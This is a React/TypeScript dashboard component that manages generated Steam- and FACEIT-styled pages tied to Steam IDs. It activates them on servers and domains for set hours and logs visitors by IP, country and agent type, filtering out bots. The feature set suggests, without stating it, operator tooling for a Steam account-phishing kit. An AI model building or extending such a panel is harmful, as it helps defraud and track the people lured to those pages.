import React, { useState, useEffect, useCallback } from 'react';
import { FileText, Eye, Trash2, Loader2, AlertCircle, X, Zap, Clock, RefreshCw, ScrollText, Globe, User, Monitor, Gamepad2, ArrowLeft, Copy, Check, Download, Map as MapIcon } from 'lucide-react';
import Loader from './Loader';
import { useAuth } from '../contexts/AuthContext';
import LogsMap from './LogsMap';

interface PageData {
  id: number;
  name: string;
  description?: string;
  template_type: string;
  steam_id?: string;
  preview_url: string;
  status: 'draft' | 'preview' | 'active' | 'expired';
  created_at: string;
  expires_at?: string;
  activations: ActivationData[];
}

interface ActivationData {
  id: number;
  server_id: number;
  server_name: string;
  server_host: string;
  domain_name?: string;
  activated_url: string;
  custom_path: string;
  status: 'active' | 'expired';
  created_at: string;
  expires_at?: string;
  activation_status?: 'activating' | 'active' | 'error';
}

interface DomainData {
  id: number;
  domain: string;
  is_active: boolean;
}

interface ServerData {
  id: number;
  name: string;
  host: string;
  is_active: boolean;
}

interface LogEntry {
  ip: string;
  timestamp: string;
  method: string;
  path: string;
  status: number;
  agentType: 'STEAM-AGENT' | 'BROWSER-AGENT';
  description: string;
  userAgent: string;
  country?: string;
}

interface Visitor {
  ip: string;
  firstSeen: string;
  lastSeen: string;
  requestCount: number;
  agentType: 'STEAM-AGENT' | 'BROWSER-AGENT';
  statuses: number[];
  country?: string;
}

const DURATION_OPTIONS = [
  { value: '1', label: '1h' },
  { value: '2', label: '2h' },
  { value: '3', label: '3h' },
  { value: '4', label: '4h' },
  { value: '5', label: '5h' },
  { value: '12', label: '12h' },
  { value: '24', label: '24h' },
  { value: '48', label: '48h' },
  { value: '72', label: '72h' },
  { value: 'forever', label: 'Never off' }
] as const;

const DEFAULT_ACTIVATION_FORM = {
  server_id: '',
  domain_id: '',
  duration: '1',
  custom_path: '',
  cloudflare_enabled: true
};

const normalizeActivationFormData = (value: any) => {
  const duration = typeof value?.duration === 'string' && DURATION_OPTIONS.some(option => option.value === value.duration)
    ? value.duration
    : DEFAULT_ACTIVATION_FORM.duration;

  return {
    server_id: typeof value?.server_id === 'string' ? value.server_id : DEFAULT_ACTIVATION_FORM.server_id,
    domain_id: typeof value?.domain_id === 'string' ? value.domain_id : DEFAULT_ACTIVATION_FORM.domain_id,
    duration,
    custom_path: typeof value?.custom_path === 'string' ? value.custom_path : DEFAULT_ACTIVATION_FORM.custom_path,
    cloudflare_enabled: typeof value?.cloudflare_enabled === 'boolean' ? value.cloudflare_enabled : DEFAULT_ACTIVATION_FORM.cloudflare_enabled
  };
};

const PagesPanel: React.FC = () => {

  const { user } = useAuth();
  const isPro = user?.role === 'pro' || user?.role === 'admin' || user?.role === 'enterprise';

  const [pages, setPages] = useState<PageData[]>([]);
  const [servers, setServers] = useState<ServerData[]>([]);
  const [serverDomains, setServerDomains] = useState<DomainData[]>([]);
  const [isLoading, setIsLoading] = useState(true);
  const [isLoadingDomains, setIsLoadingDomains] = useState(false);
  const [error, setError] = useState('');
  const [deletingId, setDeletingId] = useState<number | null>(null);
  const [toast, setToast] = useState<{ message: string; type: 'success' | 'error' } | null>(null);

  // Auto-dismiss toast
  React.useEffect(() => {
    if (toast) {
      const timer = setTimeout(() => setToast(null), 2000);
      return () => clearTimeout(timer);
    }
  }, [toast]);

  // View mode: 'history' or 'logs'
  const [viewMode, setViewMode] = useState<'history' | 'logs'>('history');

  // Logs state
  const [selectedActivation, setSelectedActivation] = useState<ActivationData | null>(null);
  const [logs, setLogs] = useState<LogEntry[]>([]);
  const [visitors, setVisitors] = useState<Visitor[]>([]);
  const [logStats, setLogStats] = useState<{ realVisitors: number; botsFiltered: number; totalPageLoads: number } | null>(null);
  const [isLoadingLogs, setIsLoadingLogs] = useState(false);
  const [logsError, setLogsError] = useState('');
  const [autoRefresh, setAutoRefresh] = useState(false);
  const [countryData, setCountryData] = useState<{ country: string; total: number; cities: { city: string; count: number }[] }[]>([]);
  const [logsExpanded, setLogsExpanded] = useState(true);
  const [visitorsExpanded, setVisitorsExpanded] = useState(true);

  // Activation modal state
  const [showActivationModal, setShowActivationModal] = useState(false);
  const [selectedPage, setSelectedPage] = useState<PageData | null>(null);
  const [activateData, setActivateData] = useState(() => {
    const saved = localStorage.getItem('activation_form_data');
    return saved ? normalizeActivationFormData(JSON.parse(saved)) : DEFAULT_ACTIVATION_FORM;
  });
  const [customPathHistory, setCustomPathHistory] = useState<string[]>(() => {
    const saved = localStorage.getItem('custom_path_history');
    return saved ? JSON.parse(saved) : [];
  });
  const [showPathSuggestions, setShowPathSuggestions] = useState(false);

  useEffect(() => {
    localStorage.setItem('activation_form_data', JSON.stringify(activateData));
  }, [activateData]);

  const saveCustomPathToHistory = (path: string) => {
    if (!path.trim()) return;
    const newHistory = [path, ...customPathHistory.filter(p => p !== path)].slice(0, 10);
    setCustomPathHistory(newHistory);
    localStorage.setItem('custom_path_history', JSON.stringify(newHistory));
  };

  const [isActivating, setIsActivating] = useState(false);
  const [activationError, setActivationError] = useState('');
  const [activatingIds, setActivatingIds] = useState<number[]>([]);

  const loadData = useCallback(async (silent = false) => {
    try {
      if (!silent) setIsLoading(true);
      setError('');

      const pagesResponse = await fetch('/api/pages', { credentials: 'include' });
      const pagesData = await pagesResponse.json();

      if (pagesData.success) {
        setPages(pagesData.pages);
      } else {
        setError(pagesData.error || 'Failed to load pages');
      }

      const serversResponse = await fetch('/api/servers/my', { credentials: 'include' });
      const serversData = await serversResponse.json();

      if (serversData.success) {
        setServers(serversData.servers.filter((s: ServerData) => s.is_active));
      }

    } catch (error) {
      console.error('Error loading data:', error);
      setError('Failed to load data');
    } finally {
      if (!silent) setIsLoading(false);
    }
  }, []);

  useEffect(() => {
    loadData();
    const interval = setInterval(() => { loadData(true); }, 120000);
    return () => clearInterval(interval);
  }, [loadData]);

  // Load logs for selected activation
  const loadLogs = useCallback(async () => {
    if (!selectedActivation) return;

    try {
      setIsLoadingLogs(true);
      setLogsError('');
      const response = await fetch(`/api/page-logs/activation/${selectedActivation.id}?lines=200`, {
        credentials: 'include'
      });
      const data = await response.json();

      if (data.success) {
        setLogs(data.logs || []);
        setVisitors(data.visitors || []);
        setLogStats(data.stats || null);

        // Calculate country stats client-side from logs
        // This ensures map works instantly without needing DB sync
        const logsData = data.logs || [];
        const stats: Record<string, { country: string; total: number; cities: string[] }> = {};

        logsData.forEach((log: any) => {
          if (log.country) {
            const country = log.country.toLowerCase();
            if (!stats[country]) {
              stats[country] = { country, total: 0, cities: [] };
            }
            stats[country].total++;
            if (log.city) {
              stats[country].cities.push(log.city);
            }
          }
        });

        // Format for map component
        const formattedCountryData = Object.values(stats).map(stat => {
          // Count cities
          const cityCounts: Record<string, number> = {};
          stat.cities.forEach(city => {
            cityCounts[city] = (cityCounts[city] || 0) + 1;
          });

          return {
            country: stat.country,
            total: stat.total,
            cities: Object.entries(cityCounts).map(([city, count]) => ({ city, count }))
          };
        });

        console.log('[PagesPanel] Client-side country stats:', formattedCountryData);
        setCountryData(formattedCountryData);
      } else {
        setLogsError(data.error || 'Failed to load logs');
      }

    } catch (err) {
      setLogsError('Failed to connect to server');
    } finally {
      setIsLoadingLogs(false);
    }
  }, [selectedActivation]);

  useEffect(() => {
    if (selectedActivation) {
      loadLogs();
    }
  }, [selectedActivation, loadLogs]);

  // Auto-refresh logs (faster interval)
  useEffect(() => {
    if (!autoRefresh || !selectedActivation) return;
    const interval = setInterval(() => { loadLogs(); }, 3000); // Refresh every 3 seconds
    return () => clearInterval(interval);
  }, [autoRefresh, selectedActivation, loadLogs]);

  const handleDeleteActivation = async (activationId: number) => {
    if (!window.confirm('Delete this activation?')) return;

    try {
      const response = await fetch(`/api/pages/activations/${activationId}`, {
        method: 'DELETE',
        credentials: 'include'
      });
      const data = await response.json();

      if (data.success) {
        await loadData();
        if (selectedActivation?.id === activationId) {
          setSelectedActivation(null);
        }
      } else {
        setError(data.error || 'Failed to delete activation');
      }
    } catch (error) {
      setError('Failed to delete activation');
    }
  };

  const handleDeletePage = async (pageId: number) => {
    if (!window.confirm('Delete this page?')) return;

    try {
      setDeletingId(pageId);
      const response = await fetch(`/api/pages/${pageId}`, {
        method: 'DELETE',
        credentials: 'include'
      });
      const data = await response.json();

      if (data.success) {
        setPages(pages.filter(p => p.id !== pageId));
      } else {
        setError(data.error || 'Failed to delete page');
      }
    } catch (error) {
      setError('Failed to delete page');
    } finally {
      setDeletingId(null);
    }
  };

  const loadDomainsForServer = async (serverId: string) => {
    if (!serverId) {
      setServerDomains([]);
      return;
    }

    try {
      setIsLoadingDomains(true);
      const response = await fetch('/api/domains', { credentials: 'include' });
      const data = await response.json();

      if (data.success) {
        const transformedDomains = data.domains.map((d: any) => ({
          id: d.id,
          domain: d.domain,
          is_active: d.is_active || d.nginx_config_deployed
        }));
        setServerDomains(transformedDomains.filter((d: DomainData) => d.is_active));
      } else {
        setServerDomains([]);
      }
    } catch (error) {
      setServerDomains([]);
    } finally {
      setIsLoadingDomains(false);
    }
  };

  const handleOpenActivationModal = (page: PageData) => {
    setSelectedPage(page);
    const saved = localStorage.getItem('activation_form_data');
    const savedData = saved ? normalizeActivationFormData(JSON.parse(saved)) : DEFAULT_ACTIVATION_FORM;
    const nextActivationData = {
      ...savedData,
      domain_id: ''
    };
    setActivateData(nextActivationData);
    loadDomainsForServer(nextActivationData.server_id);
    setActivationError('');
    setActivatingIds([]);
    setShowActivationModal(true);
  };

  const handleCloseActivationModal = () => {
    setShowActivationModal(false);
    setSelectedPage(null);
    setActivateData(DEFAULT_ACTIVATION_FORM);
    setServerDomains([]);
    setActivationError('');
  };

  const handleActivate = async (e: React.FormEvent) => {
    e.preventDefault();
    if (!selectedPage) return;

    try {
      setIsActivating(true);
      setActivationError('');
      const tempActivationId = Date.now();
      setActivatingIds([...activatingIds, tempActivationId]);

      const response = await fetch(`/api/pages/${selectedPage.id}/activate`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        credentials: 'include',
        body: JSON.stringify({
          server_id: parseInt(activateData.server_id),
          domain_id: activateData.domain_id ? parseInt(activateData.domain_id) : null,
          duration_hours: activateData.duration === 'forever' ? null : parseInt(activateData.duration, 10),
          custom_path: activateData.custom_path,
          cloudflare_enabled: activateData.cloudflare_enabled
        })
      });

      const data = await response.json();

      if (data.success) {
        saveCustomPathToHistory(activateData.custom_path);
        await new Promise(resolve => setTimeout(resolve, 1500));
        await loadData();
        handleCloseActivationModal();
        setActivatingIds(activatingIds.filter(id => id !== tempActivationId));
      } else {
        setActivationError(data.error || 'Failed to activate page');
        setActivatingIds(activatingIds.filter(id => id !== tempActivationId));
      }
    } catch (error) {
      setActivationError('Failed to activate page');
    } finally {
      setIsActivating(false);
    }
  };

  const formatDateOnly = (dateString: string) => {
    return new Date(dateString).toLocaleDateString('ru-RU', {
      day: '2-digit',
      month: '2-digit',
      year: 'numeric'
    });
  };

  const [currentTime, setCurrentTime] = useState(Date.now());

  useEffect(() => {
    const timer = setInterval(() => {
      setCurrentTime(Date.now());
      const hasExpiredActivations = pages.some(page =>
        page.activations.some(activation => {
          if (!activation.expires_at) return false;
          return isActivationExpired(activation.expires_at);
        })
      );
      if (hasExpiredActivations) {
        loadData();
      }
    }, 1000);
    return () => clearInterval(timer);
  }, [pages, loadData]);

  const getTimeRemaining = (expiresAt: string) => {
    const now = currentTime;
    const expiry = new Date(expiresAt).getTime();
    const diff = expiry - now;

    if (diff <= 0) return 'Expired';

    const hours = Math.floor(diff / (1000 * 60 * 60));
    const minutes = Math.floor((diff % (1000 * 60 * 60)) / (1000 * 60));
    const seconds = Math.floor((diff % (1000 * 60)) / 1000);

    if (hours > 0) return `${hours}h ${minutes}m`;
    if (minutes > 0) return `${minutes}m ${seconds}s`;
    return `${seconds}s`;
  };

  const isActivationExpired = (expiresAt: string) => {
    return new Date(expiresAt).getTime() <= currentTime;
  };

  const isActivationActive = (activation: ActivationData) => {
    if (activation.status !== 'active') return false;
    if (!activation.expires_at) return true;
    return !isActivationExpired(activation.expires_at);
  };

  const getActivationDurationLabel = (activation: ActivationData) => {
    return activation.expires_at ? getTimeRemaining(activation.expires_at) : 'Unlimited';
  };

  const formatTime = (timestamp: string) => {
    try {
      const date = new Date(timestamp);

      const now = new Date();

      const diff = now.getTime() - date.getTime();
      const minutes = Math.floor(diff / 60000);
      const hours = Math.floor(minutes / 60);
      const days = Math.floor(hours / 24);

      const timeStr = date.toLocaleTimeString('ru-RU', {
        hour: '2-digit',
        minute: '2-digit',
        timeZone: 'Europe/Moscow'
      });

      // Show absolute time + relative
      if (minutes < 1) return `${timeStr}`;
      if (minutes < 60) return `${timeStr} (${minutes}m ago)`;
      if (hours < 24) return `${timeStr} (${hours}h ago)`;

      return date.toLocaleString('ru-RU', {
        day: '2-digit',
        month: '2-digit',
        hour: '2-digit',
        minute: '2-digit',
        timeZone: 'Europe/Moscow'
      });
    } catch {
      return timestamp;
    }
  };

  const getStatusColor = (status: number) => {
    if (status >= 200 && status < 300) return 'text-green-400';
    if (status >= 300 && status < 400) return 'text-blue-400';
    if (status >= 400 && status < 500) return 'text-yellow-400';
    return 'text-red-400';
  };

  const getAgentIcon = (agentType: string) => {
    if (agentType === 'STEAM-AGENT') {
      return <Gamepad2 className="w-4 h-4 text-green-400" />;
    }
    return <Monitor className="w-4 h-4 text-blue-400" />;
  };

  const getAgentBadge = (agentType: string) => {
    if (agentType === 'STEAM-AGENT') {
      return <span className="px-2 py-0.5 text-xs font-semibold rounded bg-green-500/20 text-green-400">STEAM</span>;
    }
    return <span className="px-2 py-0.5 text-xs font-semibold rounded bg-blue-500/20 text-blue-400">BROWSER</span>;
  };

  const getCountryFlag = (country?: string) => {
    if (!country) return null;
    const code = country.toLowerCase();
    return (
      <img
        src={`https://cdn.jsdelivr.net/gh/lipis/flag-icons/flags/4x3/${code}.svg`}
        alt={country}
        className="w-5 h-4 rounded-sm object-cover"
        title={country.toUpperCase()}
        onError={(e) => { (e.target as HTMLImageElement).style.display = 'none'; }}
      />
    );
  };

  // Get all active activations across all pages
  const allActiveActivations = pages.flatMap(page =>
    page.activations.filter(isActivationActive)
      .map(a => ({ ...a, page }))
  );

  if (isLoading) {
    return (
      <div className="w-full h-full flex items-center justify-center">
        <div className="text-center space-y-4">
          <div className="flex justify-center"><Loader /></div>
          <p className="text-white/50">Loading pages...</p>
        </div>
      </div>
    );
  }

  // LOGS VIEW MODE
  if (viewMode === 'logs') {
    return (
      <div className="w-full min-h-full animate-fade-in">
        <div className="flex gap-6 h-[calc(100vh-140px)]">
          {/* Left Sidebar - Activations List */}
          <div className="w-72 flex-shrink-0 flex flex-col">
            <div className="mb-4">
              <button
                onClick={() => { setViewMode('history'); setSelectedActivation(null); }}
                className="flex items-center gap-2 text-white/50 hover:text-white mb-3"
              >
                <ArrowLeft className="w-4 h-4" />
                <span className="text-sm">Back to History</span>
              </button>
              <h1 className="text-2xl font-bold text-white">Page Logs</h1>
              <p className="text-sm text-white/40 mt-1">Real-time visitors</p>
            </div>

            <div className="flex-1 overflow-y-auto space-y-2">
              {allActiveActivations.length === 0 ? (
                <div className="p-4 text-center">
                  <ScrollText className="w-8 h-8 text-white/20 mx-auto mb-2" />
                  <p className="text-white/40 text-sm">No active pages</p>
                  <p className="text-white/30 text-xs mt-1">Activate a page first</p>
                </div>
              ) : (
                allActiveActivations.map((activation) => (
                  <button
                    key={activation.id}
                    onClick={() => setSelectedActivation(activation)}
                    className={`w-full p-3 rounded-lg text-left transition-all border ${selectedActivation?.id === activation.id
                      ? 'bg-white/10 border-white/20'
                      : 'bg-white/[0.02] border-white/5 hover:bg-white/5 hover:border-white/10'
                      }`}
                  >
                    <div className="flex items-center gap-2 mb-1">
                      <div className="w-2 h-2 rounded-full bg-green-400 animate-pulse" />
                      <span className="font-mono text-white text-sm">/{activation.custom_path}</span>
                    </div>
                    <p className="text-xs text-white/40 truncate">{activation.server_name}</p>
                    <div className="flex items-center gap-2 mt-2 text-xs text-white/30">
                      <Clock className="w-3 h-3" />
                      <span>{getActivationDurationLabel(activation)}</span>
                    </div>
                  </button>
                ))
              )}
            </div>

            <div className="pt-4 border-t border-white/10 mt-4">
              <button
                onClick={() => loadData(true)}
                className="w-full flex items-center justify-center gap-2 py-2 text-white/50 hover:text-white text-sm"
              >
                <RefreshCw className="w-4 h-4" />
                Refresh list
              </button>
            </div>
          </div>

          {/* Right Panel - Logs Content */}
          <div className="flex-1 rounded-xl bg-white/[0.02] border border-white/10 flex flex-col overflow-hidden">
            {!selectedActivation ? (
              <div className="flex-1 flex items-center justify-center">
                <div className="text-center">
                  <ScrollText className="w-12 h-12 text-white/20 mx-auto mb-4" />
                  <p className="text-white/50">Select an activation</p>
                  <p className="text-white/30 text-sm mt-1">to view logs</p>
                </div>
              </div>
            ) : (
              <>
                {/* Logs Header */}
                <div className="px-6 py-4 border-b border-white/10 flex items-center justify-between">
                  <div>
                    <h3 className="text-lg font-medium text-white">/{selectedActivation.custom_path}</h3>
                    <p className="text-sm text-white/40">{selectedActivation.server_name}</p>
                  </div>
                  <div className="flex items-center gap-3">
                    <a
                      href={`/api/page-logs/export/${selectedActivation.id}/csv`}
                      download
                      className="flex items-center p-2 bg-white/5 hover:bg-white/10 rounded-lg transition-all duration-300 group"
                    >
                      <Download className="w-5 h-5 text-white/50 group-hover:text-white transition-colors" />
                      <span className="max-w-0 overflow-hidden group-hover:max-w-xs transition-all duration-300 ease-in-out opacity-0 group-hover:opacity-100 whitespace-nowrap">
                        <span className="ml-2 text-sm font-medium text-white/90">Export CSV</span>
                      </span>
                    </a>
                    <label className="flex items-center gap-3 cursor-pointer group select-none">
                      <div className="relative inline-flex items-center">
                        <input
                          type="checkbox"
                          checked={autoRefresh}
                          onChange={(e) => setAutoRefresh(e.target.checked)}
                          className="sr-only peer"
                        />
                        <div className="w-9 h-5 rounded-full transition-colors duration-200 peer-checked:bg-[rgb(var(--accent-primary-rgb))] bg-white/10 peer-focus:ring-2 peer-focus:ring-[rgb(var(--accent-primary-rgb))]/30"></div>
                        <div className="absolute top-[2px] left-[2px] bg-white rounded-full h-4 w-4 transition-transform duration-200 shadow-sm peer-checked:translate-x-4"></div>
                      </div>
                      <span className="text-sm font-medium text-white/50 group-hover:text-white/80 transition-colors">Auto-refresh</span>
                    </label>
                    <button
                      onClick={loadLogs}
                      disabled={isLoadingLogs}
                      className="p-2 hover:bg-white/5 rounded-lg transition-colors"
                    >
                      <RefreshCw className={`w-5 h-5 text-white/50 ${isLoadingLogs ? 'animate-spin' : ''}`} />
                    </button>
                  </div>
                </div>

                {/* Logs Content */}
                <div className="flex-1 overflow-y-auto p-6 space-y-6">
                  {logsError && (
                    <div className="p-4 bg-red-500/10 border border-red-500/20 rounded-lg flex items-center gap-2">
                      <AlertCircle className="w-5 h-5 text-red-400" />
                      <span className="text-red-400">{logsError}</span>
                    </div>
                  )}

                  {isLoadingLogs && !logs.length ? (
                    <div className="flex items-center justify-center py-12">
                      <Loader2 className="w-8 h-8 text-white/50 animate-spin" />
                    </div>
                  ) : (
                    <>
                      {/* Map Visualization - Always show */}
                      <div className="mb-6">
                        <h4 className="text-lg font-semibold text-white mb-3 flex items-center gap-2">
                          <MapIcon className="w-5 h-5" />
                          Visitor Locations
                        </h4>
                        <div className="h-[400px] rounded-lg overflow-hidden relative bg-black/20">
                          {/* Grid background - gray, subtle, blurred */}
                          <div
                            className="absolute inset-0 z-0 opacity-20"
                            style={{
                              backgroundImage: `
                                linear-gradient(rgba(128, 128, 128, 0.4) 1px, transparent 1px),
                                linear-gradient(90deg, rgba(128, 128, 128, 0.4) 1px, transparent 1px)
                              `,
                              backgroundSize: '40px 40px',
                              filter: 'blur(0.5px)'
                            }}
                          />
                          <div className="relative z-10 h-full">
                            <LogsMap countries={countryData} />
                          </div>
                        </div>
                      </div>

                      {/* Stats */}
                      <div className="grid grid-cols-5 gap-4">
                        <div className="p-4 bg-white/5 rounded-lg">
                          <p className="text-2xl font-bold text-white">{logs.length}</p>
                          <p className="text-sm text-white/40">Requests</p>
                        </div>
                        <div className="p-4 bg-green-500/10 border border-green-500/20 rounded-lg">
                          <p className="text-2xl font-bold text-green-400">
                            {logStats?.realVisitors ?? visitors.filter((v: any) => v.isRealVisitor).length}
                          </p>
                          <p className="text-sm text-green-400/60">Real Visitors</p>
                        </div>
                        <div className="p-4 bg-white/5 rounded-lg">
                          <p className="text-2xl font-bold text-white">{visitors.length}</p>
                          <p className="text-sm text-white/40">Unique IPs</p>
                        </div>
                        <div className="p-4 bg-white/5 rounded-lg">
                          <p className="text-2xl font-bold text-purple-400">
                            {visitors.filter((v: any) => v.agentType === 'STEAM-AGENT').length}
                          </p>
                          <p className="text-sm text-white/40">Steam</p>
                        </div>
                        <div className="p-4 bg-white/5 rounded-lg">
                          <p className="text-2xl font-bold text-blue-400">
                            {visitors.filter((v: any) => v.agentType === 'BROWSER-AGENT').length}
                          </p>
                          <p className="text-sm text-white/40">Browser</p>
                        </div>
                      </div>

                      {/* Unique Visitors - Collapsible */}
                      {visitors.length > 0 && (
                        <div>
                          <button
                            onClick={() => setVisitorsExpanded(!visitorsExpanded)}
                            className="w-full flex items-center justify-between mb-3 hover:opacity-80 transition-opacity"
                          >
                            <h4 className="text-lg font-semibold text-white flex items-center gap-2">
                              <User className="w-5 h-5" />
                              Unique Visitors ({visitors.length})
                            </h4>
                            <div className={`transform transition-transform ${visitorsExpanded ? 'rotate-180' : ''}`}>
                              <svg className="w-5 h-5 text-white/50" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                              </svg>
                            </div>
                          </button>
                          {visitorsExpanded && (
                            <div className="bg-white/5 rounded-lg overflow-hidden border border-white/10">
                              <div className="max-h-60 overflow-y-auto">
                                <table className="w-full text-sm">
                                  <thead className="bg-black/30 sticky top-0">
                                    <tr>
                                      <th className="text-left py-3 px-4 text-white/60 font-semibold">IP</th>
                                      <th className="text-left py-3 px-4 text-white/60 font-semibold">Agent</th>
                                      <th className="text-left py-3 px-4 text-white/60 font-semibold">Requests</th>
                                      <th className="text-left py-3 px-4 text-white/60 font-semibold">Last Seen</th>
                                      <th className="text-left py-3 px-4 text-white/60 font-semibold">Statuses</th>
                                    </tr>
                                  </thead>
                                  <tbody>
                                    {visitors.map((visitor, idx) => (
                                      <tr key={idx} className="border-t border-white/5 hover:bg-white/10 transition-colors">
                                        <td className="py-3 px-4">
                                          <div className="flex items-center gap-2">
                                            {getCountryFlag(visitor.country)}
                                            <span className="font-mono text-white">{visitor.ip}</span>
                                          </div>
                                        </td>
                                        <td className="py-3 px-4">
                                          <div className="flex items-center gap-2">
                                            {getAgentIcon(visitor.agentType)}
                                            {getAgentBadge(visitor.agentType)}
                                          </div>
                                        </td>
                                        <td className="py-3 px-4">
                                          <span className="text-white font-semibold">{visitor.requestCount}</span>
                                        </td>
                                        <td className="py-3 px-4 text-white/60">{formatTime(visitor.lastSeen)}</td>
                                        <td className="py-3 px-4">
                                          <div className="flex gap-1.5">
                                            {visitor.statuses.filter(s => s !== 304).map((status, i) => (
                                              <span key={i} className={`${getStatusColor(status)} font-mono text-xs px-1.5 py-0.5 rounded`}>
                                                {status}
                                              </span>
                                            ))}
                                          </div>
                                        </td>
                                      </tr>
                                    ))}
                                  </tbody>
                                </table>
                              </div>
                            </div>
                          )}
                        </div>
                      )}

                      {/* Recent Logs - Collapsible */}
                      <div>
                        <button
                          onClick={() => setLogsExpanded(!logsExpanded)}
                          className="w-full flex items-center justify-between mb-3 hover:opacity-80 transition-opacity"
                        >
                          <h4 className="text-lg font-semibold text-white flex items-center gap-2">
                            <Globe className="w-5 h-5" />
                            Recent Logs ({logs.length})
                          </h4>
                          <div className={`transform transition-transform ${logsExpanded ? 'rotate-180' : ''}`}>
                            <svg className="w-5 h-5 text-white/50" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                            </svg>
                          </div>
                        </button>
                        {logsExpanded && (
                          <div className="bg-white/5 rounded-lg overflow-hidden border border-white/10">
                            <div className="max-h-96 overflow-y-auto">
                              {logs.length === 0 ? (
                                <div className="p-8 text-center">
                                  <Globe className="w-12 h-12 mx-auto mb-3 text-white/20" />
                                  <p className="text-white/50">No logs found</p>
                                  <p className="text-sm text-white/30 mt-1">Logs will appear when visitors access the page</p>
                                </div>
                              ) : (
                                <div className="divide-y divide-white/5">
                                  {[...logs]
                                    .filter(l => l.status !== 304) // Hide 304 per user request
                                    .reverse()
                                    .slice(0, 50)
                                    .map((log, idx) => (
                                      <div key={idx} className="p-4 hover:bg-white/10 transition-colors">
                                        <div className="flex items-start justify-between">
                                          <div className="flex items-center gap-3">
                                            {getAgentIcon(log.agentType)}
                                            <div>
                                              <div className="flex items-center gap-2 flex-wrap">
                                                {getCountryFlag(log.country)}
                                                <span className="font-mono text-white font-medium">{log.ip}</span>
                                                {getAgentBadge(log.agentType)}
                                                <span className={`font-mono font-bold text-sm px-2 py-0.5 rounded ${getStatusColor(log.status)}`}>
                                                  [{log.status}]
                                                </span>
                                              </div>
                                              <p className="text-sm text-white/50 mt-1.5">{log.description}</p>
                                            </div>
                                          </div>
                                          <div className="text-right ml-4">
                                            <p className="text-sm text-white/60 font-medium">{formatTime(log.timestamp)}</p>
                                            <p className="text-xs text-white/40 truncate max-w-xs mt-1" title={log.path}>
                                              {log.method} {log.path}
                                            </p>
                                          </div>
                                        </div>
                                      </div>
                                    ))}
                                </div>
                              )}
                            </div>
                          </div>
                        )}
                      </div>
                    </>
                  )}
                </div>
              </>
            )}
          </div>
        </div>
      </div>
    );
  }

  // HISTORY VIEW MODE (default)
  return (
    <div className="w-full min-h-full animate-fade-in">
      {/* Toast notification */}
      {toast && (
        <div className={`fixed top-6 left-1/2 -translate-x-1/2 z-50 px-4 py-2 rounded-lg flex items-center gap-2 ${toast.type === 'success' ? 'bg-green-500' : 'bg-red-500'} text-white text-sm shadow-lg`}>
          {toast.type === 'success' ? <Check className="w-4 h-4" /> : <AlertCircle className="w-4 h-4" />}
          {toast.message}
        </div>
      )}
      {/* Header */}
      <div className="flex items-center justify-between mb-12">
        <div>
          <h1 className="text-4xl font-bold text-white mb-2">History</h1>
          <p className="text-white/50">История сгенерированных страниц</p>
        </div>
        <div className="flex items-center gap-3">
          {isPro && (
            <button
              onClick={() => setViewMode('logs')}
              className="flex items-center gap-2 px-4 py-2 border border-white/10 text-white/70 rounded-lg hover:bg-white/5 hover:border-white/20 transition-all duration-300"
            >
              <ScrollText className="w-4 h-4" />
              <span>Logs</span>
              {allActiveActivations.length > 0 && (
                <span className="px-1.5 py-0.5 text-xs bg-green-500/20 text-green-400 rounded">
                  {allActiveActivations.length}
                </span>
              )}
            </button>
          )}
          <button
            onClick={() => loadData()}
            className="flex items-center gap-2 px-4 py-2 text-white/70 hover:text-white transition-colors"
          >
            <RefreshCw className="w-4 h-4" />
            <span>Обновить</span>
          </button>
        </div>
      </div>

      {error && (
        <div className="mb-6 p-4 bg-red-500/10 border border-red-500/20 rounded-lg flex items-center gap-3">
          <AlertCircle className="w-5 h-5 text-red-400" />
          <span className="text-red-400">{error}</span>
        </div>
      )}

      {/* Pages List */}
      <div className="rounded-lg bg-white/[0.02] border border-white/10 overflow-hidden animate-slide-up">
        {pages.length === 0 ? (
          <div className="p-12 text-center">
            <FileText className="w-10 h-10 text-white/20 mx-auto mb-4" />
            <p className="text-white/60 mb-1">No pages generated yet</p>
            <p className="text-white/30 text-sm">Use the Generator tab to create your first Steam page</p>
          </div>
        ) : (
          <table className="w-full">
            <thead>
              <tr className="border-b border-white/5">
                <th className="text-left py-4 px-6 text-xs font-medium text-white/40 uppercase tracking-wide">Steam ID</th>
                <th className="text-left py-4 px-6 text-xs font-medium text-white/40 uppercase tracking-wide">Created</th>
                <th className="text-left py-4 px-6 text-xs font-medium text-white/40 uppercase tracking-wide">Active Links</th>
                <th className="text-right py-4 px-6 text-xs font-medium text-white/40 uppercase tracking-wide">Actions</th>
              </tr>
            </thead>
            <tbody className="divide-y divide-white/5">
              {pages.map((page) => {
                const activeActivations = page.activations.filter(isActivationActive);

                return (
                  <tr key={page.id} className="hover:bg-white/[0.02] transition-colors">
                    {/* Steam ID with Type Badge */}
                    <td className="py-4 px-6">
                      <div className="flex items-center gap-3">
                        <div className={`w-2 h-2 rounded-full ${activeActivations.length > 0 ? 'bg-green-400' : 'bg-white/20'}`} />
                        <span className="text-white font-mono">{page.steam_id || 'Unknown'}</span>
                        {page.template_type === 'faceit' ? (
                          <span className="px-2 py-0.5 text-[10px] font-bold bg-[#ff5500]/20 text-[#ff5500] rounded uppercase">FACEIT</span>
                        ) : (
                          <span className="px-2 py-0.5 text-[10px] font-bold bg-blue-500/20 text-blue-400 rounded uppercase">STEAM</span>
                        )}
                      </div>
                    </td>

                    {/* Date */}
                    <td className="py-4 px-6">
                      <span className="text-white/50 text-sm">{formatDateOnly(page.created_at)}</span>
                    </td>

                    {/* Active Links */}
                    <td className="py-4 px-6">
                      {activeActivations.length > 0 ? (
                        <div className="flex items-center gap-2 flex-wrap">
                          {activeActivations.map((activation) => {
                            const timeRemaining = getActivationDurationLabel(activation);
                            return (
                              <div key={activation.id} className="flex items-center gap-2 px-2.5 py-1 bg-white/5 border border-white/10 rounded text-xs">
                                <button
                                  onClick={(e) => {
                                    e.preventDefault();
                                    window.open(activation.activated_url, '_blank');
                                  }}
                                  onDoubleClick={(e) => {
                                    e.preventDefault();
                                    navigator.clipboard.writeText(activation.activated_url);
                                    setToast({ message: 'Link copied!', type: 'success' });
                                  }}
                                  className="font-mono text-white/70 hover:text-white flex items-center gap-1.5 group"
                                  title="Click to open, double-click to copy"
